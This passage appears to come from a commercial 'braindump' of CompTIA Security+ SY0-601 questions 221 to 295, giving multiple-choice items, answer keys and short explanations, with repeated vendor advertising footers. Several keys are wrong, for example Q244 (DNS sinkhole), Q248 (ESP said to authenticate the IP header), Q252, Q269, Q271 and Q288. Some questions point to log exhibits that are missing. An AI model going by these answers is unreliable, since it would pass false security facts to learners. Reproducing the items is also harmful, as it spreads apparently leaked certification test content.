Configure AAA on the switch with local login as secondary.
Configure port security on the switch with the secondary login method.
Implement TACACS+
Enable the local firewall on the Active Directory server.
Implement a DHCP server.
Answer: AB
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
76
QUESTION 221
A software developer needs to perform code-execution testing, black-box testing, and nonfunctional testing on a new product before its general release. Which of the following BEST
describes the tasks the developer is conducting?
A.
B.
C.
D.
Verification
Validation
Normalization
Staging
Answer: B
Explanation:
Verification does not involve code execution while Validation involves code execution. Verification
uses methods like reviews, walkthroughs, inspections and desk-checking whereas Validation
uses methods like black box testing, white box testing and non-functional testing.
QUESTION 222
A vulnerability assessment report will include the CVSS score of the discovered vulnerabilities
because the score allows the organization to better.
A.
B.
C.
D.
validate the vulnerability exists in the organization's network through penetration testing
research the appropriate mitigation techniques in a vulnerability database
find the software patches that are required to mitigate a vulnerability
prioritize remediation of vulnerabilities based on the possible impact.
Answer: D
Explanation:
The Common Vulnerability Scoring System (CVSS) is a free and open industry standard for
assessing the severity of computer system security vulnerabilities. CVSS attempts to assign
severity scores to vulnerabilities, allowing responders to prioritize responses and resources
according to threat.
https://en.wikipedia.org/wiki/Common_Vulnerability_Scoring_System
QUESTION 223
During an incident response, a security analyst observes the following log entry on the web
server.
Which of the following BEST describes the type of attack the analyst is experience?
A.
B.
C.
D.
SQL injection
Cross-site scripting
Pass-the-hash
Directory traversal
Answer: D
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
77
Explanation:
../../../ is the clue that it’s directory.
QUESTION 224
Users have been issued smart cards that provide physical access to a building. The cards also
contain tokens that can be used to access information systems. Users can log in to any thin client
located throughout the building and see the same desktop each time. Which of the following
technologies are being utilized to provide these capabilities? (Choose two.)
A.
B.
C.
D.
E.
F.
COPE
VDI
GPS
TOTP
RFID
BYOD
Answer: BE
Explanation:
It is desktop is VDI and the card is RFID.
QUESTION 225
A security analyst discovers several .jpg photos from a cellular phone during a forensics
investigation involving a compromised system. The analyst runs a forensics tool to gather file
metadata. Which of the following would be part of the images if all the metadata is still intact?
A.
B.
C.
D.
The GPS location
When the file was deleted
The total number of print jobs
The number of copies made
Answer: A
QUESTION 226
A security analyst is performing a forensic investigation compromised account credentials.
Using the Event Viewer, the analyst able to detect the following message:
“Special privileges assigned to new login.”
Several of these messages did not have a valid logon associated with the user before these
privileges were assigned.
Which of the following attacks is MOST likely being detected?
A.
B.
C.
D.
Pass-the-hash
Buffer overflow
Cross-site scripting
Session replay
Answer: A
QUESTION 227
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
78
A security analyst needs to generate a server certificate to be used for 802.1X and secure RDP
connections. The analyst is unsure what is required to perform the task and solicits help from a
senior colleague.
Which of the following is the FIRST step the senior colleague will most likely tell the analyst to
perform to accomplish this task?
A.
B.
C.
D.
Create an OCSP
Generate a CSR
Create a CRL
Generate a .pfx file
Answer: B
Explanation:
A certificate signing request (CSR) is one of the first steps towards getting your own SSL/TLS
certificate. Generated on the same server you plan to install the certificate on, the CSR contains
information (e.g. common name, organization, country) the Certificate Authority (CA) will use to
create your certificate. It also contains the public key that will be included in your certificate and is
signed with the corresponding private key. We'll go into more details on the roles of these keys
below.
QUESTION 228
An organization hired a consultant to assist with an active attack, and the consultant was able to
identify the compromised accounts and computers.
Which of the following is the consultant MOST likely to recommend to prepare for eradication?
A. Quarantining the compromised accounts and computers, only providing them with network
access
B. Segmenting the compromised accounts and computers into a honeynet so as to not alert the
attackers.
C. Isolating the compromised accounts and computers, cutting off all network and internet access.
D. Logging off and deleting the compromised accounts and computers to eliminate attacker access.
Answer: C
Explanation:
When dealing with an active attack, it is important to isolate the compromised accounts and
computers as quickly as possible. This will help to prevent the attacker from spreading the attack
to other systems on the network.
Isolating the compromised accounts and computers can be done by cutting off all network and
internet access. This will prevent the attacker from being able to communicate with the
compromised systems.
QUESTION 229
Users at organization have been installing programs from the internet on their workstations
without first proper authorization. The organization maintains a portal from which users can install
standardized programs. However, some users have administrative access on their workstations
to enable legacy programs to function property. Which of the following should the security
administrator consider implementing to address this issue?
A.
B.
C.
D.
Application code signing
Application whitellsting
Data loss prevention
Web application firewalls
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
79
Answer: B
QUESTION 230
A security analyst needs to determine how an attacker was able to use User3 to gain a foothold
within a company's network. The company's lockout policy requires that an account be locked out
for a minimum of 15 minutes after three unsuccessful attempts.
While reviewing the log files, the analyst discovers the following:
Which of the following attacks MOST likely occurred?
A.
B.
C.
D.
Dictionary
Credential-stuffing
Password-spraying
Brute-force
Answer: C
QUESTION 231
Joe, a user at a company, clicked an email link led to a website that infected his workstation. Joe,
was connected to the network, and the virus spread to the network shares. The protective
measures failed to stop this virus, and It has continues to evade detection.
Which of the following should administrator implement to protect the environment from this
malware?
A.
B.
C.
D.
Install a definition-based antivirus.
Implement an IDS/IPS
Implement a heuristic behavior-detection solution.
Implement CASB to protect the network shares.
Answer: C
Explanation:
Heuristic analysis is also one of the few methods capable of combating polymorphic viruses -- the
term for malicious code that constantly changes and adapts. Heuristic analysis is incorporated
into advanced security solutions offered by companies like Kaspersky Labs to detect new threats
before they cause harm, without the need for a specific signature.
https://usa.kaspersky.com/resource- center/definitions/heuristic-analysis
QUESTION 232
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
80
A security analyst needs to complete an assessment. The analyst is logged into a server and
must use native tools to map services running on it to the server's listening ports. Which of the
following tools can BEST accomplish this talk?
A.
B.
C.
D.
Netcat
Netstat
Nmap
Nessus
Answer: B
QUESTION 233
An organization just experienced a major cyberattack modem. The attack was well coordinated
sophisticated and highly skilled. Which of the following targeted the organization?
A.
B.
C.
D.
Shadow IT
An insider threat
A hacktivist
An advanced persistent threat
Answer: D
QUESTION 234
A user enters a password to log in to a workstation and is then prompted to enter an
authentication code.
Which of the following MFA factors or attributes are being utilized in the authentication process?
(Choose two.)
A.
B.
C.
D.
E.
F.
Something you know
Something you have
Somewhere you are
Someone you are
Something you are
Something you can do
Answer: AB
QUESTION 235
A security engineer is reviewing log files after a third party discovered usernames and passwords
for the organization's accounts. The engineer sees there was a change in the IP address for a
vendor website one week earlier. This change lasted eight hours. Which of the following attacks
was MOST likely used?
A.
B.
C.
D.
Man-in-the middle
Spear-phishing
Evil twin
DNS poising
Answer: D
Explanation:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
81
DNS spoofing, also referred to as DNS cache poisoning, is a form of computer security hacking in
which corrupt Domain Name System data is introduced into the DNS resolver's cache, causing
the name server to return an incorrect result record, e.g. an IP address. This results in traffic
being diverted to the attacker's computer (or any other computer).
https://en.wikipedia.org/wiki/DNS_spoofing
QUESTION 236
A database administrator needs to ensure all passwords are stored in a secure manner, so the
administrate adds randomly generated data to each password before string.
Which of the following techniques BEST explains this action?
A.
B.
C.
D.
Predictability
Key stretching
Salting
Hashing
Answer: C
QUESTION 237
A network administrator is setting up wireless access points in all the conference rooms and
wants to authenticate device using PKI. Which of the following should the administrator
configure?
A.
B.
C.
D.
A captive portal
PSK
802.1X
WPS
Answer: C
QUESTION 238
An organization that is located in a flood zone is MOST likely to document the concerns
associated with the restoration of IT operation in a:
A.
B.
C.
D.
business continuity plan
communications plan.
disaster recovery plan.
continuity of operations plan
Answer: C
QUESTION 239
A network engineer is troubleshooting wireless network connectivity issues that were reported by
users. The issues are occurring only in the section of the building that is closest to the parking lot.
Users are intermittently experiencing slow speeds when accessing websites and are unable to
connect to network drives. The issues appear to increase when laptop users return desks after
using their devices in other areas of the building. There have also been reports of users being
required to enter their credentials on web pages in order to gain access to them. Which of the
following is the MOST likely cause of this issue?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
82
A.
B.
C.
D.
An external access point is engaging in an evil-twin attack.
The signal on the WAP needs to be increased in that section of the building.
The certificates have expired on the devices and need to be reinstalled.
The users in that section of the building are on a VLAN that is being blocked by the firewall.
Answer: A
Explanation:
An evil-twin attack is a type of wireless network security attack in which an attacker sets up a fake
wireless access point (WAP) that has the same name and security settings as a legitimate WAP.
When users attempt to connect to the legitimate WAP, they may unknowingly connect to the fake
WAP instead, which allows the attacker to intercept and potentially modify their network traffic.
This type of attack is particularly likely to be successful in areas where there are multiple WAPs,
such as in the section of the building closest to the parking lot, where users may be returning to
their desks after using their devices elsewhere in the building. The intermittent slow speeds and
inability to connect to network drives, as well as the reports of users being required to re-enter
their credentials on web pages, are all symptoms of an evil-twin attack.
QUESTION 240
A global pandemic is forcing a private organization to close some business units and reduce
staffing at others. Which of the following would be BEST to help the organization's executives
determine the next course of action?
A.
B.
C.
D.
An incident response plan
A communications plan
A disaster recovery plan
A business continuity plan
Answer: D
Explanation:
Business continuity may be defined as "the capability of an organization to continue the delivery
of products or services at pre-defined acceptable levels following a disruptive incident",[1] and
business continuity planning [2][3] (or business continuity and resiliency planning) is the process
of creating systems of prevention and recovery to deal with potential threats to a company.[4] In
addition to prevention, the goal is to enable ongoing operations before and during execution of
disaster recovery.[5] Business continuity is the intended outcome of proper execution of both
business continuity planning and disaster recovery.
QUESTION 241
Which of the following scenarios BEST describes a risk reduction technique?
A. A security control objective cannot be met through a technical change, so the company purchases
insurance and is no longer concerned about losses from data breaches.
B. A security control objective cannot be met through a technical change, so the company implements a
policy to train users on a more secure method of operation.
C. A security control objective cannot be met through a technical change, so the company changes as
method of operation
D. A security control objective cannot be met through a technical change, so the Chief Information Officer
(CIO) decides to sign off on the risk.
Answer: B
Explanation:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
83
Risk reduction techniques are designed to lower the probability or impact of identified risks.
Option B describes a risk reduction technique through the implementation of a policy to train
users on a more secure method of operation, thereby reducing the probability of security
incidents caused by user error.
QUESTION 242
A company was compromised, and a security analyst discovered the attacker was able to get
access to a service account. The following logs were discovered during the investigation:
Which of the following MOST likely would have prevented the attacker from learning the service
account name?
A.
B.
C.
D.
Race condition testing
Proper error handling
Forward web server logs to a SIEM
Input sanitization
Answer: B
QUESTION 243
An end user reports a computer has been acting slower than normal for a few weeks. During an
investigation, an analyst determines the system is sending the user's email address and a tendigit number to an IP address once a day. The only recent log entry regarding the user's
computer is the following:
Which of the following is the MOST likely cause of the issue?
A.
B.
C.
D.
The end user purchased and installed a PUP from a web browser
A bot on the computer is brute forcing passwords against a website
A hacker is attempting to exfiltrate sensitive data
Ransomware is communicating with a command-and-control server.
Answer: A
QUESTION 244
Which of the following scenarios would make a DNS sinkhole effective in thwarting an attack?
A. An attacker is sniffing traffic to port 53, and the server is managed using unencrypted usernames and
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
84
passwords.
B. An organization is experiencing excessive traffic on port 53 and suspects an attacker is trying to DoS
the domain name server.
C. Malware trying to resolve an unregistered domain name to determine if it is running in an isolated
sandbox
D. Routing tables have been compromised, and an attacker is rerouting traffic to malicious websites
Answer: A
QUESTION 245
A security analyst reviews the datacenter access logs for a fingerprint scanner and notices an
abundance of errors that correlate with users' reports of issues accessing the facility.
Which of the following MOST likely the cause of the cause of the access issues?
A.
B.
C.
D.
False rejection
Cross-over error rate
Efficacy rale
Attestation
Answer: A
Explanation:
Where a legitimate user is not recognized. This is also referred to as a Type I error or false nonmatch rate (FNMR). FRR is measured as a percentage.
QUESTION 246
A company’s Chief Information Security Officer (CISO) recently warned the security manager that
the company’s Chief Executive Officer (CEO) is planning to publish a controversial opinion article
in a national newspaper, which may result in new cyberattacks.
Which of the following would be BEST for the security manager to use in a threat model?
A.
B.
C.
D.
Hacktivists
White-hat hackers
Script kiddies
Insider threats
Answer: A
QUESTION 247
When used at the design stage, which of the following improves the efficiency, accuracy, and
speed of a database?
A.
B.
C.
D.
Tokenization
Data masking
Normalization
Obfuscation
Answer: C
QUESTION 248
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
85
An analyst needs to set up a method for securely transferring files between systems. One of the
requirements is to authenticate the IP header and the payload. Which of the following services
would BEST meet the criteria?
A.
B.
C.
D.
TLS
PFS
ESP
AH
Answer: C
Explanation:
ESP (Encapsulating Security Payload) is a security protocol that provides authentication,
integrity, and confidentiality for IP packets. ESP can be used to secure the transfer of files
between systems.
ESP works by encrypting the IP header and the payload of the IP packet. The encryption key is
shared between the sender and receiver of the packet. This ensures that only the intended
recipient can decrypt the packet and read its contents.
ESP also provides authentication and integrity services. Authentication ensures that the packet
has not been modified in transit. Integrity ensures that the packet has not been tampered with.
QUESTION 249
A company has determined that if its computer-based manufacturing is not functioning for 12
consecutive hours, it will lose more money that it costs to maintain the equipment. Which of the
following must be less than 12 hours to maintain a positive total cost of ownership?
A.
B.
C.
D.
MTBF
RPO
RTO
MTTR
Answer: C
QUESTION 250
Which of the following control sets should a well-written BCP include? (Select THREE)
A.
B.
C.
D.
E.
F.
G.
Preventive
Detective
Deterrent
Corrective
Compensating
Physical
Recovery
Answer: ADG
QUESTION 251
The manager who is responsible for a data set has asked a security engineer to apply encryption
to the data on a hard disk. The security engineer is an example of a:
A. data controller
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
86
B. data owner
C. data custodian
D. data processor
Answer: C
Explanation:
Data custodian - this role handles managing the system on which the data assets are stored. This
includes responsibility for enforcing access control, encryption, and backup/recovery measures
QUESTION 252
Which of the following disaster recovery tests is The LEAST time-consuming for the disaster
recovery team?
A.
B.
C.
D.
Tabletop
Parallel
Full interruption
Simulation
Answer: D
QUESTION 253
Some laptops recently went missing from a locked storage area that is protected by keyless
RFID-enabled locks. There is no obvious damage to the physical space. The security manager
identifies who unlocked the door, however, human resources confirms the employee was on
vacation at the time of the incident. Which of the following describes what MOST likely occurred?
A.
B.
C.
D.
The employee's physical access card was cloned.
The employee is colluding with human resources
The employee's biometrics were harvested
A criminal used lock picking tools to open the door.
Answer: A
QUESTION 254
Which of the following would be the BEST resource for a software developer who is looking to
improve secure coding practices for web applications?
A.
B.
C.
D.
OWASP
Vulnerability scan results
NIST CSF
Third-party libraries
Answer: A
Explanation:
OWASP (Open Web Application Security Project) is the BEST resource for a software developer
who is looking to improve secure coding practices for web applications. OWASP is a non-profit
organization that provides free and open resources for improving software security, including a
comprehensive list of web application security risks, secure coding guidelines, and testing tools.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
87
QUESTION 255
A security analyst is reviewing logs on a server and observes the following output:
Which of the following is the security analyst observing?
A.
B.
C.
D.
A rainbow table attack
A password-spraying attack
A dictionary attack
A keylogger attack
Answer: C
QUESTION 256
A security analyst needs to make a recommendation for restricting access to certain segments of
the network using only data-link layer security.
Which of the following controls will the analyst MOST likely recommend?
A.
B.
C.
D.
MAC
ACL
BPDU
ARP
Answer: A
QUESTION 257
Several employees have noticed other bystanders can clearly observe a terminal where
passcodes are being entered.
Which of the following can be eliminated with the use of a privacy screen?
A.
B.
C.
D.
Shoulder surfing
Spear phishing
Impersonation attack
Card cloning
Answer: A
QUESTION 258
An organization routes all of its traffic through a VPN Most users are remote and connect into a
corporate datacenter that houses confidential information There is a firewall at the Internet border
followed by a DIP appliance, the VPN server and the datacenter itself.
Which of the following is the WEAKEST design element?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
88
A.
B.
C.
D.
The DLP appliance should be integrated into a NGFW.
Split-tunnel connections can negatively impact the DLP appliance's performance
Encrypted VPN traffic will not be inspected when entering or leaving the network
Adding two hops in the VPN tunnel may slow down remote connections
Answer: C
QUESTION 259
Which of the following are requirements that must be configured for PCI DSS compliance?
(Choose two.)
A.
B.
C.
D.
E.
Testing security systems and processes regularly
Installing and maintaining a web proxy to protect cardholder data
Assigning a unique ID to each person with computer access
Encrypting transmission of cardholder data across private networks
Benchmarking security awareness training for contractors F. Using vendor-supplied default passwords
for system passwords
Answer: BD
QUESTION 260
A network technician is installing a guest wireless network at a coffee shop. When a customer
purchases an Item, the password for the wireless network is printed on the recent so the
customer can log in.
Which of the following will the technician MOST likely configure to provide the highest level of
security with the least amount of overhead?
A.
B.
C.
D.
WPA-EAP
WEP-TKIP
WPA-PSK
WPS-PIN
Answer: C
Explanation:
WPA-PSK is a pre-shared key authentication method that uses a passphrase to encrypt data. It is
the most common type of WPA security and is relatively easy to configure. The passphrase can
be printed on the receipt, making it easy for customers to connect to the network.
QUESTION 261
A security engineer needs to implement an MDM solution that complies with the corporate mobile
device policy. The policy states that in order for mobile users to access corporate resources on
their devices, the following requirements must be met:
- Mobile device OSs must be patched up to the latest release.
- A screen lock must be enabled (passcode or biometric).
- Corporate data must be removed if the device is reported lost or
stolen.
Which of the following controls should the security engineer configure? (Choose two.)
A. Containerization
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
89
B.
C.
D.
E.
F.
Storage segmentation
Posturing
Remote wipe
Full-device encryption
Geofencing
Answer: CD
Explanation:
Device Posture helps you to protect your applications and reduce security risks. Device Posture
collects security-related device data, such as OS and browser version, disk encryption and
antivirus status. With this data you can define and enforce application access control policies.
QUESTION 262
Which of the following would BEST identify and remediate a data-loss event in an enterprise
using third-party, web-based services and file-sharing platforms?
A.
B.
C.
D.
SIEM
CASB
UTM
DLP
Answer: B
Explanation:
A Cloud Access Security Broker (CASB) is a security solution that sits between an enterprise's
on-premises infrastructure and its cloud-based applications and services. It helps to secure the
use of these cloud-based services by providing visibility, control, and protection for data in the
cloud. A CASB can help to identify and remediate data-loss events by monitoring the use of
cloud-based services, identifying unusual or suspicious activity, and alerting the appropriate
personnel when necessary. It can also help to prevent data loss by enforcing policies to control
the access and use of data in the cloud, and by providing encryption and other security measures
to protect data in transit and at rest.
QUESTION 263
A forensics examiner is attempting to dump password cached in the physical memory of a live
system but keeps receiving an error message. Which of the following BEST describes the cause
of the error?
A.
B.
C.
D.
The examiner does not have administrative privileges to the system
The system must be taken offline before a snapshot can be created
Checksum mismatches are invalidating the disk image
The swap file needs to be unlocked before it can be accessed
Answer: A
QUESTION 264
To reduce and overhead, an organization wants to move from an on-premises email solution to a
cloud-based email solution. At this time, no other services will be moving. Which of the following
cloud models would BEST meet the needs of the organization?
A. MaaS
B. laaS
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
90
C. SaaS
D. PaaS
Answer: C
Explanation:
Software as a service (SaaS) allows users to connect to and use cloud-based apps over the
Internet. Common examples are email, calendaring, and office tools (such as Microsoft Office
365).
QUESTION 265
A security manager for a retailer needs to reduce the scope of a project to comply with PCI DSS.
The PCI data is located in different offices than where credit cards are accepted. All the offices
are connected via MPLS back to the primary datacenter. Which of the following should the
security manager implement to achieve the objective?
A.
B.
C.
D.
Segmentation
Containment
Geofencing
Isolation
Answer: A
QUESTION 266
A company is launching a new internet platform for its clients. The company does not want to
implement its own authorization solution but instead wants to rely on the authorization provided
by another platform.
Which of the following is the BEST approach to implement the desired solution?
A.
B.
C.
D.
OAuth
TACACS+
SAML
RADIUS
Answer: A
QUESTION 267
The facilities supervisor for a government agency is concerned about unauthorized access to
environmental systems in the event the staff WiFi network is breached. Which of the blowing
would BEST address this security concern?
A.
B.
C.
D.
install a smart meter on the staff WiFi.
Place the environmental systems in the same DHCP scope as the staff WiFi.
Implement Zigbee on the staff WiFi access points.
Segment the staff WiFi network from the environmental systems network.
Answer: D
QUESTION 268
A security analyst is reviewing the output of a web server log and notices a particular account is
attempting to transfer large amounts of money:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
91
Which of the following types of attack is MOST likely being conducted?
A.
B.
C.
D.
SQLi
CSRF
Session replay
API
Answer: B
Explanation:
What is a CSRF attack? Cross site request forgery (CSRF) is a vulnerability where an attacker
performs actions while impersonating another user. For example, transferring funds to an
attacker's account, changing a victim's email address, or they could even just redirect a pizza to
an attacker's address!
QUESTION 269
A security analyst is logged into a Windows file server and needs to see who is accessing files
and from which computers.
Which of the following tools should the analyst use?
A.
B.
C.
D.
E.
netstat
net share
netcat
nbtstat
net session
Answer: A
QUESTION 270
After consulting with the Chief Risk Officer (CRO). A manager decides to acquire cybersecurity
insurance for the company.
Which of the following risk management strategies is the manager adopting?
A.
B.
C.
D.
Risk acceptance
Risk avoidance
Risk transference
Risk mitigation
Answer: C
QUESTION 271
A company is designing the layout of a new datacenter so it will have an optimal environmental
temperature.
Which of the following must be included? (Select TWO)
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
92
A.
B.
C.
D.
E.
F.
An air gap
A cold aisle
Removable doors
A hot aisle
An loT thermostat
A humidity monitor
Answer: EF
QUESTION 272
A security analyst is investigating an incident to determine what an attacker was able to do on a
compromised laptop. The analyst reviews the following SIEM log:
Which of the following describes the method that was used to compromise the laptop?
A. An attacker was able to move laterally from PC1 to PC2 using a pass-the-hash attack
B. An attacker was able to bypass application whitelisting by emailing a spreadsheet attachment
with an embedded PowerShell in the file
C. An attacker was able to install malware to the CAasdf234 folder and use it to gam
administrator nights and launch Outlook
D. An attacker was able to phish user credentials successfully from an Outlook user profile
Answer: B
Explanation:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
93
Based on the provided information, it appears that the attacker was able to bypass application
whitelisting by emailing a spreadsheet attachment with an embedded PowerShell in the file, as
indicated by the "New Process" event with the process name "lat.ps1" and the "Creator Process
Name" of "powershell.exe". This suggests that the attacker was able to execute a PowerShell
script to run malicious code.
QUESTION 273
A company has decided to move its operations to the cloud. It wants to utilize technology that will
prevent users from downloading company applications for personal use, restrict data that is
uploaded, and have visibility into which applications are being used across the company.
Which of the following solutions will BEST meet these requirements?
A.
B.
C.
D.
An NGFW
A CASB
Application whitelisting
An NG-SWG
Answer: B
QUESTION 274
An attacker is exploiting a vulnerability that does not have a patch available. Which of the
following is the attacker exploiting?
A.
B.
C.
D.
Zero-day
Default permissions
Weak encryption
Unsecure root accounts
Answer: A
QUESTION 275
An attacker has successfully exfiltrated several non-salted password hashes from an online
system.
Given the logs below:
Which of the following BEST describes the type of password attack the attacker is performing?
A. Dictionary
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
94
B. Pass-the-hash
C. Brute-force
D. Password spraying
Answer: A
Explanation:
A password that long broken in a few minutes? Must be a dictionary attack; brute force attacks
could take years to crack passwords of that length.
QUESTION 276
A company is upgrading its wireless infrastructure to WPA2-Enterprise using EAP-TLS.
Which of the following must be part of the security architecture to achieve AAA? (Select TWO)
A.
B.
C.
D.
E.
F.
DNSSEC
Reverse proxy
VPN concentrator
PKI
Active Directory
RADIUS
Answer: DF
QUESTION 277
A company has a flat network that is deployed in the cloud. Security policy states that all
production and development servers must be segmented. Which of the following should be used
to design the network to meet the security requirements?
A.
B.
C.
D.
CASB
VPC
Perimeter network
WAF
Answer: B
Explanation:
Security policy states that all production and development servers must be segmented
You could use multiple VPCs within your cloud enviroment to segementate the network.
QUESTION 278
An information security incident recently occurred at an organization, and the organization was
required to report the incident to authorities and notify the affected parties. When the
organization's customers became of aware of the incident, some reduced their orders or stopped
placing orders entirely. Which of the following is the organization experiencing?
A.
B.
C.
D.
Reputation damage
Identity theft
Anonymlzation
Interrupted supply chain
Answer: A
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
95
QUESTION 279
An attacker is attempting to exploit users by creating a fake website with the URL users. Which of
the following social-engineering attacks does this describe?
A.
B.
C.
D.
Information elicitation
Typo squatting
Impersonation
Watering-hole attack
Answer: D
QUESTION 280
Following a prolonged datacenter outage that affected web-based sales a company has decided
to move its operations to a private cloud solution. The security team has received the following
requirements:
- There must be visibility into how teams are using cloud-based
services.
- The company must be able to identify when data related to payment
cards is being sent to the cloud.
- Data must be available regardless of the end user's geographic
location
- Administrators need a single pane-of-glass view into traffic and
trends.
Which of the following should the security analyst recommend?
A.
B.
C.
D.
Create firewall rules to restrict traffic to other cloud service providers.
Install a DLP solution to monitor data in transit.
Implement a CASB solution.
Configure a web-based content filter.
Answer: C
Explanation:
The security team has received the following requirements:
- how teams are using cloud-based services.
- identify when data related to payment cards is being sent to the cloud.
- single pane-of-glass view into traffic and trends.
QUESTION 281
A security engineer has enabled two-factor authentication on all workstations. Which of the
following approaches are the MOST secure? (Choose two.)
A.
B.
C.
D.
E.
F.
Password and security question
Password and CAPTCHA
Password and smart card
Password and fingerprint
Password and one-time token
Password and voice
Answer: CD
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
96
QUESTION 282
A large enterprise has moved all Hs data to the cloud behind strong authentication and
encryption.
A sales director recently had a laptop stolen and later, enterprise data was round to have been
compromised database.
Which of the following was the MOST likely cause?
A.
B.
C.
D.
E.
Shadow IT
Credential stuffing
SQL injection
Man-in-the-browser
Bluejacking
Answer: A
QUESTION 283
During a routine scan of a wireless segment at a retail company, a security administrator
discovers several devices are connected to the network that do not match the company's naming
convention and are not in the asset Inventory. WiFi access Is protected with 255-Wt encryption
via WPA2. Physical access to the company's facility requires two-factor authentication using a
badge and a passcode.
Which of the following should the administrator implement to find and remediate the Issue?
(Choose two.)
A.
B.
C.
D.
E.
F.
Check the SIEM for failed logins to the LDAP directory.
Enable MAC filtering on the switches that support the wireless network.
Run a vulnerability scan on all the devices in the wireless network
Deploy multifactor authentication for access to the wireless network
Scan the wireless network for rogue access points.
Deploy a honeypot on the network
Answer: BE
QUESTION 284
A security analyst is hardening a Linux workstation and must ensure it has public keys forwarded
to remote systems for secure login.
Which of the following steps should the analyst perform to meet these requirements? (Choose
two.)
A.
B.
C.
D.
E.
Forward the keys using ssh-copy-id.
Forward the keys using scp.
Forward the keys using ash -i.
Forward the keys using openssl -s.
Forward the keys using ssh-keygen.
Answer: AB
Explanation:
ssh-copy-id installs an SSH key on a server as an authorized key. Its purpose is to provide
access without requiring a password for each login.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
97
Normally, scp asks for a password. To avoid this, or to automate file copying in scripts, public key
authentication is usually used.
QUESTION 285
A company recently experienced an attack in which a malicious actor was able to exfiltrate data
by cracking stolen passwords, using a rainbow table the sensitive data.
Which of the following should a security engineer do to prevent such an attack in the future?
A.
B.
C.
D.
Use password hashing.
Enforce password complexity.
Implement password salting.
Disable password reuse.
Answer: C
QUESTION 286
The website http://companywebsite.com requires users to provide personal Information, Including
security question responses, for registration.
Which of the following would MOST likely cause a data breach?
A.
B.
C.
D.
Lack of input validation
Open permissions
Unsecure protocol
Missing patches
Answer: C
QUESTION 287
The process of passively gathering information poor to launching a cyberattack is called:
A.
B.
C.
D.
tailgating
reconnaissance
pharming
prepending
Answer: B
QUESTION 288
An attacked is attempting to exploit users by creating a fake website with the URL
www.validwebsite.com. The attacker s intent is to imitate the look and feel of a legitimate website
to obtain personal information from unsuspecting users.
Which of the following social-engineering attacks does this describe?
A.
B.
C.
D.
Information elicitation
Typo squatting
Impersonation
Watering-hole attack
Answer: D
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
98
QUESTION 289
An attacker is trying to gain access by installing malware on a website that is known to be visited
by the target victims. Which of the following is the attacker MOST likely attempting?
A.
B.
C.
D.
A spear-phishing attack
A watering-hole attack
Typo squatting
A phishing attack
Answer: B
QUESTION 290
Which of the following types of controls is a CCTV camera that is not being monitored?
A.
B.
C.
D.
Detective
Deterrent
Physical
Preventive
Answer: B
Explanation:
CCTV (closed circuit television) is a cheaper means of providing surveillance than maintaining
separate guards at each gateway or zone, though still not cheap to set up if the infrastructure is
not already in place on the premises. It is also quite an effective DETERRENT.
QUESTION 291
A cybersecurity administrator is using iptables as an enterprise firewall. The administrator created
some rules, but the network now seems to be unresponsive. All connections are being dropped
by the firewall. Which of the following would be the BEST option to remove the rules?
A.
B.
C.
D.
# iptables -t mangle -X
# iptables -F
# iptables -Z
# iptables -P INPUT -j DROP
Answer: B
Explanation:
The "-F" flag will flush all the existing iptable rules, allowing for a fresh start. This should help get
the network back online and allow the administrator to start creating new rules that will not cause
any network disruption.
QUESTION 292
A security analyst is configuring a large number of new company-issued laptops. The analyst
received the following requirements:
- The devices will be used internationally by staff who travel
extensively.
- Occasional personal use is acceptable due to the travel requirements.
- Users must be able to install and configure sanctioned programs and
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
99
productivity suites.
- The devices must be encrypted
- The devices must be capable of operating in low-bandwidth
environments.
Which of the following would provide the GREATEST benefit to the security posture of the
devices?
A.
B.
C.
D.
Configuring an always-on VPN
Implementing application whitelisting
Requiring web traffic to pass through the on-premises content filter
Setting the antivirus DAT update schedule to weekly
Answer: A
QUESTION 293
A privileged user at a company stole several proprietary documents from a server. The user also
went into the log files and deleted all records of the incident. The systems administrator has Just
informed investigators that other log files are available for review.
Which of the following did the administrator MOST likely configure that will assist the
investigators?
A.
B.
C.
D.
Memory dumps
The syslog server
The application logs
The log retention policy
Answer: B
QUESTION 294
A security engineer at an offline government facility is concerned about the validity of an SSL
certificate. The engineer wants to perform the fastest check with the least delay to determine if
the certificate has been revoked.
Which of the following would BEST these requirement?
A.
B.
C.
D.
RA
OCSP
CRL
CSR
Answer: C
Explanation:
OCSP (Online Certificate Status Protocol) needs to send a request to obtain the status of the
certificate. Because the site is offline, a CRL would BEST meet the requirements.
QUESTION 295
A security analyst needs to perf rm periodic vulnerability scans on production systems.
Which of the following scan Types would produce the BEST vulnerability scan report?
A. Port
B. Intrusive
